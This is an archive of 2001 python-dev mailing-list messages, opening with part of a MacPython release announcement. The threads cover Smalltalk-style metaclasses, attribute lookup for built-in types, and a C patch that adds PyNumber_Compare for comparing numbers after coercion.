MacPython offers a lot of Mac-specific extensions, including access to all major MacOS Toolbox modules (QuickDraw, QuickTime, AppleScript and many more), an Integrated Development Environment (in Python!), frameworks for windowing applications, unix-compatible cgi-scripting, image-manipulation libraries, numerical libraries, tk-based machine-independent windowing and lots more. It also uniquely among Pythons allows you to create fully self-contained (and, hence, distributable) applications without needing a C compiler or anything. New in this version: - A choice of Carbon or Classic runtime, so runs on anything between MacOS 8.1 and MacOS X - Distutils support for easy installation of extension packages - BBedit language plugin - All the platform-independent Python 2.1 mods - New version of Numeric - Lots of bug fixes - Choice of normal and active installer Please send feedback on this release to pythonmac-sig at python.org, where all the MacPythoneers hang out. Enjoy, -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From guido at digicool.com Wed May 2 02:52:29 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 19:52:29 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of how metaclasses work in Smalltalk. He should know, since he invented them! :-) I include it below, with his permission. While implementing more class-like behavior for built-in types in the experimental descr-branch in the 2.2 CVS tree, I've noticed problems caused by Python's collapsing of class attributes and instance attributes. For example, suppose d is a dictionary. My experimental changes make d.__class__ return DictType (from the types module).
(DictType.__class__ is TypeType, by the way.) I also added special methods. For example, d.__repr__() now returns repr(d). I am preparing for subclassing of built-in types, so I will eventually be able to derive a class MyDictType from DictType, as follows: class MyDictType(DictType): ... Now comes the fun part. Suppose MyDictType wants to define its own repr(): class MyDictType(DictType): def __repr__(self): return "MyDictType(%s)" % DictType.__repr__(self) But, (surprise, surprise!), DictType itself also has a __repr__() method: it returns the string "". So the above code would fail: DictType.__repr__() returns repr(DictType), and DictType.__repr__(self) raises an argument count error. The correct __repr__ method for dictionary objects can be found as DictType.__dict__['__repr__'], but that looks hideous! What to do? Pragmatically, I can make DictType.__repr__ return DictType.__dict__['__repr__'], and all will be well in this example. But we have to tread carefully here: DictType.__class__ is TypeType, but DictType.__dict__['__class__'] is a descriptor for the __class__ attribute on dictionary objects. The best rule I can think of so far is that DictType.__dict__ gives the *true* set of attribute descriptors for dictionary objects, and is thus similar to Smalltalks's class.methodDict that Jim describes below. DictType.foo is a shortcut that can resolve to either DictType.__dict__['foo'] or to an attribute (maybe a method) of DictType described in TypeType.__dict__['foo'], whichever is defined. If both are defined, I propose the following, clumsy but backwards compatible rule: if DictType.__dict__['foo'] describes a method, it wins. Otherwise, TypeType.__dict__['foo'] wins. Sigh. 
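A minimal sketch of the lookup ambiguity described above, assuming a modern Python 3 interpreter rather than the 2.2 descr-branch under discussion (so `dict` stands in for `DictType` and `type` for `TypeType`). `MyDict` and `show_lookups()` are hypothetical names. Looking up `__repr__` on the class finds the instance method stored in the class's own `__dict__`; the metaclass's method has to be named explicitly through `type`.

```python
# Sketch assuming Python 3: `dict` plays the role of DictType and `type`
# the role of TypeType from the discussion.


class MyDict(dict):
    """Hypothetical stand-in for the MyDictType example."""

    def __repr__(self):
        # dict.__repr__ resolves to the method stored in dict.__dict__, so it
        # can be called with an instance, as the MyDictType example intends.
        return "MyDict(%s)" % dict.__repr__(self)


def show_lookups():
    d = MyDict(a=1)
    instance_repr = repr(d)               # uses MyDict.__repr__
    class_repr = type.__repr__(dict)      # the metaclass's repr of the class
    same_entry = dict.__repr__ is dict.__dict__["__repr__"]
    return instance_repr, class_repr, same_entry


print(show_lookups())
```

Modern Python settles the clash roughly along the lines proposed here: an entry found in the class's own `__dict__` (searched along the MRO) wins over an ordinary method of the metaclass, while data descriptors reachable from the metaclass, such as `__class__`, take priority.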
--Guido van Rossum (home page: http://www.python.org/~guido/) ------------------------- Jim Althoff's message --------------------------- Hi Guido, I was reading the discussion on class methods in the python-dev archive and noticed your question about how Smalltalk determines the difference between instance methods and class methods. I have some info on this which I can't post to python-dev, not being a member; but I thought you might be interested in it anyway. It turns out that I am the one that devised metaclasses in Smalltalk-80. (On the other hand, I haven't looked at any Smalltalk implementation code in a long time so this is merely a description of how it all started.) Basically (I think) Smalltalk doesn't have the ambiguity you mention for instance methods versus class methods (as Python would) because Smalltalk doesn't do method lookup the same as Python does. To illustrate, suppose you have object.method() (using Python-style syntax). The Smalltalk method lookup is as follows: o find the class that object is an instance of -- this resulting thing is a "class object" (a first-class object, same as in Python) o since class is a "class object" one of its fields will be a dict of methods -- let's call it class.methodDict o find method in class.methodDict o if found, execute method on object o if not, do the same thing traversing the (single inheritance) superclass chain (follow class.superClass) I believe Python works roughly as follows (Just testing my own understanding here -- correct me if I don't get it right): o convert (conceptually at least) object.method() into object.__class__.method(object) o find a _function_ corresponding to method in object.__class__.__dict__ o if found, execute the found function (with object bound as the first arg to function) o if not, traverse the (multiple inheritance) superclass chain (depth first) I think the key difference is that Python treats object.method() the same as it treats object.__class__.method(object).
Smalltalk doesn't do this. In Smalltalk, object.__class__.method(object) would mean: o consider object.__class__ to be an "object" like any other "object" in Smalltalk (which it is) o get the "class object" of object.__class__, namely object.__class__.__class__ o find method in object.__class__.__class__.methodDict o if found, execute the method on object.__class__ o if not, do the same thing traversing the (single inheritance) superclass chain (follow object.__class__.__class__.superClass) In other words, it is exactly the same lookup mechanism. So there is no ambiguity. To summarize, in Smalltalk: o instance methods (for instances that are not "class objects") are specified by: instance.instanceMethod() o class methods are specified by: class.classMethod() o both of these are just object.objectMethod() since classes are objects and the method lookup mechanism is no different from that of any other kind of object. A concrete example: If I have a class Date in Smalltalk and an instance of it referenced by a variable d, I would do: o d.followingDate() for an instance method, and o Date.currentDate() for a class method I think this is a nice, conceptually simple model. Things get interesting, though, when you start to consider how the mechanism of class.__class__ -- which is the thing that makes class methods no different than instance methods -- actually works. And this leads to metaclasses in Smalltalk. Here's a rough sketch of how metaclasses work: Standard principles of Smalltalk: o everything is an object (first-class) o every object is an instance of a class o a class inherits (single-inheritance) from its superclass (except the root class Object, which has no superclass) o methods can be invoked on an object.
All such methods are defined as part of the object's class definition (or a class going up the superclass chain) Because of the first 2 principles above: o every class is an object (because everything is an object) o every class is, itself, an instance of some class (because every object is an instance of a class) Originally in Smalltalk-76, there was one metaclass, Class. All classes (class objects) were instances of Class. Class was an instance of itself. Class had methods defined for it just like all classes did. In particular, it had a method "new" -- this being the method that creates instances of classes. So suppose you had class Rectangle. Rectangle is an instance of Class (hence it is a class object). If you wanted to create an instance of Rectangle, you would do: myRect = Rectangle.new(). This would mean: "find the 'new' method in the definition of Rectangle's class (Class) and invoke it on Rectangle (which is a class object). The result is a Rectangle instance which is assigned to the variable myRect. The Rectangle class object held data (state -- same rules as any other kind of object) -- such as number and name of fields its instances would have, a dictionary of methods for its instances, etc. So the "new" method in Class would have access to all the info it needed to create a Rectangle instance (as opposed to a Point instance, for example). The limitation with this scheme was that all classes had to share exactly the same methods, namely all the methods defined in Class. The method "new" was one of these methods along with lots of "reflection-type" methods for class creation, modification, and inspection. But if you wanted an "application-oriented" class method -- like Date.currentDate() -- you couldn't do that because then the method "currentDate" would be shared amongst all class objects (instances of Class) and wouldn't make any sense (e.g., Rectangle.currentDate()). 
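The uniform lookup rule described above (start at the receiver's class, search its method dictionary, then follow the single-inheritance superclass chain) can be sketched as a toy model in Python. This is not real Smalltalk: `STObject`, `STClass`, `send()` and the `Date`/`DateMetaClass`/`Class`/`MetaClass` objects are hypothetical names, and the class-side `currentDate` simply returns a fresh instance instead of today's date. The point is that `send(date, "currentDate")` and `send(d, "followingDate")` go through the same code path. The only difference is which class the receiver is an instance of.

```python
# Toy model (not real Smalltalk) of uniform message lookup: find the
# receiver's class, search its method dictionary, then walk superclasses.


class STObject:
    """Any object in the toy model; it only knows which class it belongs to."""

    def __init__(self, st_class=None):
        self.st_class = st_class


class STClass(STObject):
    """A class is itself an object, plus a method dict and a superclass."""

    def __init__(self, name, st_class=None, superclass=None, methods=None):
        super().__init__(st_class)
        self.name = name
        self.superclass = superclass
        self.method_dict = dict(methods or {})


def send(receiver, selector, *args):
    """Same lookup rule for every receiver, whether it is a class or not."""
    cls = receiver.st_class
    while cls is not None:
        method = cls.method_dict.get(selector)
        if method is not None:
            return method(receiver, *args)
        cls = cls.superclass  # single-inheritance chain
    owner = getattr(receiver.st_class, "name", "?")
    raise AttributeError("%s does not understand %r" % (owner, selector))


# Hypothetical objects mirroring the Date example.
metaclass = STClass("MetaClass")
class_cls = STClass("Class", methods={"new": lambda cls: STObject(cls)})
date_meta = STClass(
    "DateMetaClass",
    st_class=metaclass,      # every metaclass is an instance of MetaClass
    superclass=class_cls,    # ... and a subclass of Class, so it inherits "new"
    methods={"currentDate": lambda cls: send(cls, "new")},
)
date = STClass(
    "Date",
    st_class=date_meta,      # Date is the (singleton) instance of its metaclass
    methods={"followingDate": lambda self: send(self.st_class, "new")},
)

d = send(date, "currentDate")    # found in DateMetaClass.method_dict
nxt = send(d, "followingDate")   # found in Date.method_dict
```

Sending `currentDate` to a `Date` instance fails, because the instance's class (`Date`) does not define it; class-side methods live only in the per-class metaclass, which is the separation the Smalltalk-80 design provides.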
In Smalltalk-80 I added a more flexible mechanism which we called metaclasses (we hadn't used that terminology previously for the single Class although it was a "metaclass"). The thing that everyone in the Smalltalk development team liked about the new metaclass mechanism at the time was that it didn't require any new basic principles for Smalltalk. It was all done using the same basic principles of Smalltalk listed above. The idea was to use subclassing to allow for different methods for different instances of Class. A "metaclass" simply became a subclass of Class. Each class object then ended up being a singleton instance (although the "singleton-ness" was not mandatory) of a metaclass (i.e., a subclass of Class). So class objects were no longer _all_ instances of the _same_ class (Class). Each was an instance of a corresponding subclass of Class -- that is to say, an instance of a metaclass. The Smalltalk-80 class hierarchy looked like the following: (This is actually a simplification. The actual hierarchy has a little more factoring and I changed the names for more clarity). First a digression on some terminology: o a class is an object that can be instantiated o a metaclass is a class such that, when it is instantiated, the instance is itself a class o a plain-object is one that cannot be instantiated (I'm just making this term up). o a plain-class is one that is a class but is not a metaclass (making this up, too). In the list below, indentation indicates class hierarchy (superclass -- subclass) plain-class ---------------- o Class o Object isInstanceOf o ObjectMetaClass isInstanceOf MetaClass o Class isInstanceOf o ClassMetaClass isInstanceOf MetaClass o MetaClass isInstanceOf o MetaClassMetaClass isInstanceOf MetaClass . . . o Rectangle isInstanceOf o RectangleMetaClass isInstanceOf MetaClass o SpecializedRectangle isInstanceOf o SpecializedRectangleMetaClass isInstanceOf MetaClass All "metaclasses" are instances of MetaClass.
All "plain-classes" (those that are not "metaclasses") are instances of a "metaclass". Because of this there are parallel class hierarchies between "plain-classes" and their corresponding "metaclasses". Note that MetaClass is a "plain-class" and not a "metaclass". Also note that MetaClass (being a "plain-class") is an instance of its corresponding "metaclass" MetaClassMetaClass. And MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass _is_ a "metaclass"). The MetaClass / MetaClassMetaClass class/instance relationship is circular. An example. If you want a Rectangle class you first make a metaclass for it, RectangleMetaClass -- actually, the system does this for you automatically as part of the class creation method implementation (when you define the class Rectangle, for example). RectangleMetaClass is an instance of MetaClass so all the methods defined in MetaClass are available to it. RectangleMetaClass can also define its own methods now (because it is a class) which would be invoked on any (typically one) instance of RectangleMetaClass, which in this case is going to be class Rectangle. You then make your Rectangle class by making an instance of RectangleMetaClass (conceptually doing: Rectangle = RectangleMetaClass.new() ). Now you can make instances of Rectangle, doing: myRect = Rectangle.new() as before. This is not so different from the Smalltalk-76 mechanism. The main advantage is that you now have a specific class, RectangleMetaClass, that can have methods specific to the class Rectangle (the instance of RectangleMetaClass). So you could define a method like "newFromPointToPoint" for example and then do: myRect = Rectangle.newFromPointToPoint(point1,point2). The meaning is the same as always: take the variable "Rectangle", find out what it is pointing to. It is pointing to an instance of the RectangleMetaClass. Find the method "newFromPointToPoint" as part of the definition of RectangleMetaClass (it being a class object). 
Invoke this method on the Rectangle class object -- which then creates a Rectangle instance. The same would go for the other example: Date.currentDate(). So the bottom line is (I think) that the Smalltalk method lookup mechanism doesn't have to resolve an ambiguity because all methods that get invoked on an object always come from the object's definition class (or superclass) and from no other place. Hope this helps, Jim From guido at digicool.com Wed May 2 03:29:28 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:29:28 -0500 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200." <3AEF2903.79308F55@lemburg.com> References: <3AEF2903.79308F55@lemburg.com> Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com> > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). > > Was this part of the coercion patch left out on purpose or > a simple oversight ? I hope the latter... Hard to say. I don't think I paid very close attention to your patch; Neil did, but I changed a lot of the code around coercions and comparisons in order to implement rich comparisons. So, several things may have happened: Neil lost it; Neil decided against it; or I ripped it out. Can you elucidate me regarding the issues? (If there's code, please quote it or link to a specific patch.) Since the concept of "number" is ill-defined at best, when exactly should PyNumber_Compare() be called? What is it supposed to do? Does it need a rich cousin? 
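As a rough modern-Python illustration of letting each type decide how comparisons work instead of coercing both operands centrally (an assumption for illustration, not MAL's C patch or the mx.Number API): a rich comparison method returns `NotImplemented` for operand types it does not handle, and the interpreter then tries the reflected method of the other operand. `Number` and its `_coerce()` helper are hypothetical names.

```python
from fractions import Fraction


class Number:
    """Hypothetical numeric type that decides for itself how to compare."""

    def __init__(self, value):
        self.value = Fraction(value)

    def _coerce(self, other):
        # Per-type coercion: accept only the types this class understands.
        if isinstance(other, Number):
            return other.value
        if isinstance(other, (int, Fraction)):
            return Fraction(other)
        return NotImplemented

    def __eq__(self, other):
        o = self._coerce(other)
        return NotImplemented if o is NotImplemented else self.value == o

    def __lt__(self, other):
        o = self._coerce(other)
        return NotImplemented if o is NotImplemented else self.value < o


# int.__gt__ returns NotImplemented for a Number, so Python falls back to
# the reflected Number.__lt__(Number(2), 3).
print(3 > Number(2))
```

Because both sides get a chance to answer, no central coercion step has to know about every numeric type; an operand pair that neither side handles raises `TypeError` for ordering comparisons, while `==` falls back to identity.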
--Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Wed May 2 02:42:15 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 1 May 2001 17:42:15 -0700 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500 References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> Message-ID: <20010501174215.A9565@glacier.fnational.com> [MAL] > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). I remember the API. I don't remember what happened to it. Guido might have dropped it or I might have taken it out thinking the comparison issues would be sorted out by Guido. Why is a new API needed? Why can't PyObject_Compare() do the right thing (ie. not coerce new style numbers)? Neil From guido at digicool.com Wed May 2 03:55:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:55:59 -0500 Subject: [Python-Dev] Slight wart in __all__ In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000." References: Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com> > Would it make sense to a explicitly raise a more meaningful exception here > if __all__ doesnt contain strings? Definitely. Be my guest. 
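The suggestion about `__all__` could look roughly like the following hypothetical helper, which validates `__all__` before a star-import would use it. `check_all()` is an illustrative name, not a CPython API, and the wording of the error message is an assumption.

```python
import types


def check_all(module):
    """Hypothetical check: raise a clear TypeError if __all__ holds a non-string."""
    names = getattr(module, "__all__", None)
    if names is None:
        return []  # no __all__: a star-import would fall back to public names
    for item in names:
        if not isinstance(item, str):
            raise TypeError("item in %s.__all__ must be str, not %s"
                            % (module.__name__, type(item).__name__))
    return list(names)


demo = types.ModuleType("demo")
demo.__all__ = ["a", 1]
try:
    check_all(demo)
except TypeError as exc:
    print(exc)
```

Naming the module and the offending type in the message is the point: it tells the user which `__all__` to fix, instead of failing later with an unrelated error.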
--Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Wed May 2 03:22:47 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 13:22:47 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Guido: > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. Yeek! I think that's far too confusing a rule. I suppose it might do in the meantime, but we'd better have a long term solution in mind before going too far down this route. Ultimately it seems like we'll have to introduce a separate namespace for methods and default instance attributes, say __classdict__. Then lookup of x.foo would look first in x.__dict__, then x.__class__.__classdict__, etc up the inheritance chain. Then we'll have to resolve the ambiguity of the class.foo syntax. The bravest way would be simply to change the syntax for getting unbound methods. The most common use for these seems to be for calling inherited methods, so perhaps something like inherited MyBaseClass.foo(arg, ...) which would be equivalent to getmethod(MyBaseClass, 'foo')(self, arg, ...) where getmethod() is a new builtin like getattr() except that it looks in the __classdict__, and 'self' is really whatever the first argument of the containing method was. Now that we have __future__, would such a change be contemplatable? Or is it too radical to even think about? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. 
| greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Wed May 2 04:48:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 21:48:43 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200." <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> > Guido: > > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. Greg Ewing: > Yeek! I think that's far too confusing a rule. I suppose > it might do in the meantime, but we'd better have a long > term solution in mind before going too far down this > route. I agree 100%. I had to do something quick to be able to make progress with my PEP 252 project, but it's a clear indication that there's a problem! > Ultimately it seems like we'll have to introduce a separate > namespace for methods and default instance attributes, > say __classdict__. Then lookup of x.foo would look > first in x.__dict__, then x.__class__.__classdict__, > etc up the inheritance chain. Except that sometimes you really do want x.__class__.__classdict__ to have priority (e.g. for "guarded" attributes). > Then we'll have to resolve the ambiguity of the class.foo > syntax. The bravest way would be simply to change the syntax > for getting unbound methods. Agreed again. > The most common use for these seems to be for calling > inherited methods, so perhaps something like > > inherited MyBaseClass.foo(arg, ...) > > which would be equivalent to > > getmethod(MyBaseClass, 'foo')(self, arg, ...) 
> > where getmethod() is a new builtin like getattr() > except that it looks in the __classdict__, and 'self' > is really whatever the first argument of the containing > method was. The second most common use is to reference class variables (e.g. imagine a class that keeps counters of how many instances have been created and deleted in C.initcount and C.delcount). But these should not have to change, since they really are class attributes. > Now that we have __future__, would such a change be contemplatable? > Or is it too radical to even think about? If we can find a way to spell "super.method", we should be ready for the future. I can't think of something right off the bat unfortunately. But the issue of backwards compatibility is a big one here: the idioms for calling base class methods and using class variables as defaults for instance variables are so common that we will have to support these for many future versions! (Two things I am not looking forward to: fixing all the Zope code that uses this, and telling the author of Programming Python, 2nd. ed.) --Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Wed May 2 04:48:20 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 14:48:20 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Guido: > Except that sometimes you really do want x.__class__.__classdict__ to > have priority (e.g. for "guarded" attributes). What's a "guarded" attribute? > But the issue of backwards compatibility is a big one here I was thinking that, while this is still in the __future__, the __dict__ attribute would be a pseudo-dict that, by default, behaves like the union of the old __dict__ and the __classdict__. 
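Greg's proposed `getmethod()` builtin is only described in prose in this thread. The following is a hypothetical sketch of it in modern Python that searches class dictionaries along the MRO only (never the instance dict or the metaclass), next to the `super()` spelling that eventually shipped (`super(Derived, self)` in Python 2.2, the zero-argument form in Python 3). `Base`, `Derived` and `getmethod` are illustrative names.

```python
# Hypothetical sketch of the proposed getmethod() builtin: like getattr(),
# but it only searches class dictionaries along the MRO.


def getmethod(cls, name):
    for klass in cls.__mro__:
        if name in klass.__dict__:
            return klass.__dict__[name]
    raise AttributeError("%s has no method %r" % (cls.__name__, name))


class Base:
    def foo(self, x):
        return "Base.foo(%r)" % (x,)


class Derived(Base):
    def foo(self, x):
        # "inherited Base.foo(x)", spelled with the hypothetical helper ...
        via_helper = getmethod(Base, "foo")(self, x)
        # ... and with super(), the spelling Python eventually adopted.
        via_super = super().foo(x)
        return via_helper, via_super


print(Derived().foo(1))
print(getmethod(dict, "__repr__")({"k": 2}))  # the instance repr, not type's
```

Because the helper returns the raw `__dict__` entry, a `classmethod` or `staticmethod` found this way comes back unwrapped; a fuller version would call the entry's `__get__`.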
Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From mal at lemburg.com Wed May 2 09:59:03 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 09:59:03 +0200 Subject: [Python-Dev] Coercion and comparison of numbers References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com> Message-ID: <3AEFBE47.A847C5D2@lemburg.com> Neil Schemenauer wrote: > > [MAL] > > I just received a bug report for mx.Number which revealed a > > probelm with the comparison code in Python 2.1. Looking at > > the code it seems that one of my original coercion patches > > did not make it into the core. I added a new API PyNumber_Compare() > > knows about the new coercion mechanism and should be called for > > numbers instead of trying coercion in PyObject_Compare(). > > I remember the API. I don't remember what happened to it. Guido > might have dropped it or I might have taken it out thinking the > comparison issues would be sorted out by Guido. Good; so there's a chance for getting it back in :-) > Why is a new API needed? Why can't PyObject_Compare() do the > right thing (ie. not coerce new style numbers)? I think the reason for implementing number compares as separate API was to simply shift out code from PyObject_Compare() into a new function, not so much motivated by some higher level need to do number compares. [Guido] > > Was this part of the coercion patch left out on purpose or > > a simple oversight ? I hope the latter... > > Hard to say. I don't think I paid very close attention to your patch; > Neil did, but I changed a lot of the code around coercions and > comparisons in order to implement rich comparisons. 
So, several > things may have happened: Neil lost it; Neil decided against it; or I > ripped it out. > > Can you elucidate me regarding the issues? (If there's code, please > quote it or link to a specific patch.) Since the concept of "number" > is ill-defined at best, when exactly should PyNumber_Compare() be > called? What is it supposed to do? Does it need a rich cousin? The reasoning is simple: the coercion patches basically pass control over coercion down to the APIs in question and thus provide the type with more information to choose from. This is currently implemented in 2.1 for all number methods, but not for number comparisons which do have the same problems with centralized coercion as e.g. __add__ or other binary operators. Here's part of the original patch: --- Include/orig/abstract.h Wed May 13 00:28:58 1998 +++ Include/abstract.h Thu May 21 12:31:55 1998 @@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx This function always succeeds. */ - PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); + PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2)); + + /* + Returns the result of comparing o1 and o2, or null on failure. + This is the equivalent of the Python expression: cmp(o1,o2). + */ + + PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); /* Returns the result of adding o1 and o2, or null on failure. This is the equivalent of the Python expression: o1+o2. [...] } +/* Emulate old method for comparing numeric types using coercion and + tp_compare. If coercion doesn't work, we use the type names as + comparison basis (like PyObject_Compare() does too). 
*/ + +static PyObject * +_PyNumber_OldstyleCompare(PyObject *v, + PyObject *w) +{ + int err; + + DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + err = PyNumber_CoerceEx(&v, &w); + if (err < 0) + return NULL; + else if (err == 0 && v->ob_type->tp_compare) { + int cmp; + + cmp = (*v->ob_type->tp_compare)(v, w); + /* XXX Test for errors ? Looks like C types cannot raise + exceptions in the compare slot... */ + Py_DECREF(v); + Py_DECREF(w); + DPRINTF(" compare slot returned: %i",cmp); + return PyInt_FromLong(cmp); + } + DPRINTF(" using type names for comparison\n"); + return PyInt_FromLong(strcmp(v->ob_type->tp_name, + w->ob_type->tp_name)); +} + +PyObject * +PyNumber_Compare(v, w) + PyObject *v, *w; +{ + DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + BINOP("__cmp__", "__rcmp__", PyNumber_Compare); + return _PyNumber_BinaryOperation(v,w, + NB_SLOT(nb_cmp), + "cmp()"); +} + [...] +static PyObject * +_PyNumber_BinaryOperation(PyObject *v, + PyObject *w, + const int op_slot, + const char *operation) +{ + PyNumberMethods *mv, *mw; + register PyObject *x; + register binaryfunc *slot; + int c; ... + /* When using old coercion, make sure that the requested slot + is available on old style numbers or use an emulation. */ + if (op_slot > NB_SLOT(nb_hex)) { + + /* Emulation hooks: */ + if (op_slot == NB_SLOT(nb_cmp)) + return _PyNumber_OldstyleCompare(v,w); + + goto badOperands; + } [...] int PyObject_Compare(v, w) PyObject *v, *w; { PyTypeObject *tp; @@ -291,27 +294,30 @@ PyObject_Compare(v, w) Py_DECREF(res); PyErr_SetString(PyExc_TypeError, "comparison did not return an int"); return -1; } - c = PyInt_AsLong(res); + c = PyInt_AS_LONG(res); Py_DECREF(res); return (c < 0) ? -1 : (c > 0) ? 
1 : 0; } if ((tp = v->ob_type) != w->ob_type) { - if (tp->tp_as_number != NULL && - w->ob_type->tp_as_number != NULL) { - int err; - err = PyNumber_CoerceEx(&v, &w); - if (err < 0) + if (tp->tp_as_number != NULL || + w->ob_type->tp_as_number != NULL) { + PyObject *res; + int c; + res = PyNumber_Compare(v,w); + if (res == NULL) return -1; - else if (err == 0) { - int cmp = (*v->ob_type->tp_compare)(v, w); - Py_DECREF(v); - Py_DECREF(w); - return cmp; + if (!PyInt_Check(res)) { + PyErr_SetString(PyExc_TypeError, + "comparison did not return an int"); + return -1; } + c = PyInt_AS_LONG(res); + Py_DECREF(res); + return (c < 0) ? -1 : (c > 0) ? 1 : 0; } return strcmp(tp->tp_name, w->ob_type->tp_name); } if (tp->tp_compare == NULL) return (v < w) ? -1 : 1; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 2 11:09:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 11:09:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <3AEFCEBD.2E5979C9@lemburg.com> Guido van Rossum wrote: > > While implementing more class-like behavior for built-in types in the > experimental descr-branch in the 2.2 CVS tree, I've noticed problems > caused by Python's collapsing of class attributes and instance > attributes. > > For example, suppose d is a dictionary. My experimental changes make > d.__class__ return DictType (from the types module). > (DictType.__class__ is TypeType, by the way.) I also added special > methods. For example, d.__repr__() now returns repr(d). I am > preparing for subclassing of built-in types, so I will eventually be > able to derive a class MyDictType from DictType, as follows: > > class MyDictType(DictType): > ... > > Now comes the fun part. 
Suppose MyDictType wants to define its own > repr(): > > class MyDictType(DictType): > def __repr__(self): > return "MyDictType(%s)" % DictType.__repr__(self) > > But, (surprise, surprise!), DictType itself also has a __repr__() > method: it returns the string "". > > So the above code would fail: DictType.__repr__() returns > repr(DictType), and DictType.__repr__(self) raises an argument count > error. The correct __repr__ method for dictionary objects can be > found as DictType.__dict__['__repr__'], but that looks hideous! > > What to do? Pragmatically, I can make DictType.__repr__ return > DictType.__dict__['__repr__'], and all will be well in this example. > But we have to tread carefully here: DictType.__class__ is TypeType, > but DictType.__dict__['__class__'] is a descriptor for the __class__ > attribute on dictionary objects. > > The best rule I can think of so far is that DictType.__dict__ gives > the *true* set of attribute descriptors for dictionary objects, and is > thus similar to Smalltalks's class.methodDict that Jim describes > below. DictType.foo is a shortcut that can resolve to either > DictType.__dict__['foo'] or to an attribute (maybe a method) of > DictType described in TypeType.__dict__['foo'], whichever is defined. > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. I'm not sure I can follow you here: DictType.__repr__ is the representation method of the dictionary and not inherited from TypeType, so there should be no problem. The problem with the misleading error message would only show up in case DictType does not define a __repr__ method. Then the inherited one from TypeType would come into play and cause the problem you mention above. Thinking in terms of meta-classes, I believe we should implement this mechanism in the meta-class (TypeType in this case). 
